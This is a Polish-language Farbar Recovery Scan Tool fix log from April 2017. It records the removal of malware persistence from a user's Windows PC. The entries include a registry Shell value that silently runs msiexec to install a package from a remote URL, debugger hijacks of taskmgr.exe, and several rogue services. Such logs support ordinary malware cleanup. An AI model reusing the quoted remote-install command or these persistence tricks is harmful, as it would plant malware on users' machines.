Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 23-04-2017 01 Uruchomiony przez Adrian (25-04-2017 15:55:57) Run:1 Uruchomiony z C:\Users\Adrian\Downloads Załadowane profile: Adrian (Dostępne profile: defaultuser0 & Adrian) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** Hosts: HKU\S-1-5-21-2801904889-2168516019-2050903031-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj83MTIxMTZXNTI3FUQLMkIcMYQSOTM3MkU4FdHcMjUdMH== /q HKU\S-1-5-21-2801904889-2168516019-2050903031-1001\...\MountPoints2: {7c79c117-f43a-11e6-ae1c-806e6f6e6963} - "G:\SISetup.exe" IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku BootExecute: autocheck autochk * sdnclean64.exe U3 dmwappushsvc; Brak ImagePath S4 nvvad_WaveExtensible; \SystemRoot\system32\drivers\nvvad64v.sys [X] S4 nvvhci; \SystemRoot\System32\drivers\nvvhci.sys [X] 2017-04-24 15:34 - 2017-04-25 12:56 - 00000000 ____D C:\AdwCleaner 2017-04-22 02:33 - 2017-04-22 03:24 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2017-04-22 02:33 - 2017-04-22 02:33 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking EmptyTemp: ***************** C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. HKU\S-1-5-21-2801904889-2168516019-2050903031-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKU\S-1-5-21-2801904889-2168516019-2050903031-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7c79c117-f43a-11e6-ae1c-806e6f6e6963} => klucz pomyślnie usunięto HKCR\CLSID\{7c79c117-f43a-11e6-ae1c-806e6f6e6963} => klucz nie znaleziono. HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => klucz pomyślnie usunięto HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => klucz pomyślnie usunięto HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => klucz pomyślnie usunięto HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => klucz pomyślnie usunięto HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => klucz pomyślnie usunięto HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => klucz nie znaleziono. HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => klucz nie znaleziono. HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => klucz nie znaleziono. HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => klucz nie znaleziono. HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => klucz nie znaleziono. HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => klucz nie znaleziono. HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => Wartość pomyślnie przywrócono HKLM\System\CurrentControlSet\Services\dmwappushsvc => klucz pomyślnie usunięto dmwappushsvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\nvvad_WaveExtensible => klucz pomyślnie usunięto nvvad_WaveExtensible => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\nvvhci => klucz pomyślnie usunięto nvvhci => serwis pomyślnie usunięto C:\AdwCleaner => pomyślnie przeniesiono C:\ProgramData\Spybot - Search & Destroy => pomyślnie przeniesiono C:\Windows\System32\Tasks\Safer-Networking => pomyślnie przeniesiono =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 50517276 B Java, Flash, Steam htmlcache => 32313813 B Windows/system/drivers => 18926 B Edge => 62272031 B Chrome => 1950938 B Firefox => 2330747 B Opera => 373040954 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 1329 B systemprofile32 => 3 B LocalService => 26108 B NetworkService => 359996 B defaultuser0 => 128 B Adrian => 55679581 B RecycleBin => 22866947 B EmptyTemp: => 573.5 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 15:56:35 ====